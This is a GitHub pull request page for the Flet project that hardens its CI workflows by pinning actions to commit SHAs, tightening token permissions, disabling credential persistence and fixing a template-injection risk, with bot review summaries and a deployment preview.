ci: zizmor security checks#6602
Open
ndonkoHenri wants to merge 6 commits into
Open
Conversation
Contributor
There was a problem hiding this comment.
Pull request overview
This PR hardens the repository’s GitHub Actions workflows by pinning third‑party actions to specific commit SHAs, tightening GITHUB_TOKEN permissions to least privilege (often per-job), and standardizing safer environment usage/caching behavior across CI and ancillary workflows.
Changes:
- Pin commonly used actions (checkout, setup-node, setup-uv, flutter/dart, docker, artifact upload/download, release) to commit SHAs and disable
persist-credentialson checkouts. - Move from broad workflow-level permissions to more restrictive per-job permissions across multiple workflows.
- Make caching behavior conditional (typically disabling caches on tag refs) and reduce inline
${{ }}usage in shell steps by routing values throughenv.
Reviewed changes
Copilot reviewed 7 out of 7 changed files in this pull request and generated no comments.
Show a summary per file
| File | Description |
|---|---|
| .github/workflows/release-pr-changelog.yml | Pins checkout and restricts token permissions for the changelog gate workflow. |
| .github/workflows/macos-integration-tests.yml | Pins actions, disables checkout credential persistence, and makes caching conditional. |
| .github/workflows/flet-build-test.yml | Applies least-privilege permissions, pins actions, disables checkout credential persistence, and makes caching conditional. |
| .github/workflows/flet-build-image.yml | Shifts to per-job permissions, pins docker/actions dependencies, and routes context into env vars for shell steps. |
| .github/workflows/docs.yml | Pins actions, disables checkout credential persistence, and adds conditional caching. |
| .github/workflows/ci.yml | Broadly pins actions, tightens per-job permissions, disables checkout credential persistence, and standardizes conditional caching/env usage across CI/release jobs. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
![sourcery-ai[bot]](https://avatars.githubusercontent.com/in/48477?s=60&v=4){kind=small}
|
You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool. What Enabling Code Scanning Means:
For more information about GitHub Code Scanning, check out the documentation. |
![github-advanced-security[bot]](https://avatars.githubusercontent.com/in/57789?s=60&v=4){kind=small}
|
|
||
| - name: Setup Node.js | ||
| uses: actions/setup-node@v4 | ||
| uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0 |
|
|
||
| - name: Create/Update GitHub Release | ||
| uses: softprops/action-gh-release@v2 | ||
| uses: softprops/action-gh-release@b4309332981a82ec1c5618f44dd2e27cc8bfbfda # v3.0.0 |
Deploying flet-website-v2 with
|
| Latest commit: |
5c910cf
|
| Status: | ✅ Deploy successful! |
| Preview URL: | https://3c38e54c.flet-website-v2.pages.dev |
| Branch Preview URL: | https://zizmor.flet-website-v2.pages.dev |
Brought in all flet-0.86 changes (multi-Python build matrix, flet clean command, pubsub typing, secure-storage bump, etc.) and applied zizmor security fixes to the new flet-build-test-matrix.yml: - Pinned actions/checkout, setup-uv, upload-artifact, and flutter-fvm-config-action/setup to SHA hashes - Added persist-credentials: false to checkout - Added permissions: contents: read to the build job - Moved inputs.python_version into env to fix template-injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary by Sourcery
Tighten GitHub Actions permissions, pin third‑party actions to specific SHAs, and improve caching and environment handling across CI, docs, image build, and release workflows.
Build:
CI: